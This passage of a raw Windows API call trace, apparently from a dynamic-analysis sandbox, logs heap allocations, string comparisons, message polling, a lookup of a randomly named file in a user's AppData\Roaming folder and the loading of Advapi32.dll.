returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AUT-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UT-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.510] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0200.510] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0200.510] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.510] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0200.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.511] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0200.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.512] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.512] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/k3zAUT-8EHVGD9wmf.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20c504d0, ftCreationTime.dwHighDateTime=0x1d4cd1f, ftLastAccessTime.dwLowDateTime=0x89e0af20, ftLastAccessTime.dwHighDateTime=0x1d4d033, ftLastWriteTime.dwLowDateTime=0x89e0af20, ftLastWriteTime.dwHighDateTime=0x1d4d033, nFileSizeHigh=0x0, nFileSizeLow=0x10dbe, dwReserved0=0xa580039, dwReserved1=0x176cf, cFileName="k3zAUT-8EHVGD9wmf.mp3", cAlternateFileName="K3ZAUT~1.MP3")) returned 0xaa5860 [0200.513] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.513] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0200.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.515] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.515] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0200.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.515] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.516] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.516] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.516] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.517] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.517] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.517] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.518] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.518] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.520] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.521] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.522] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.522] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.522] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 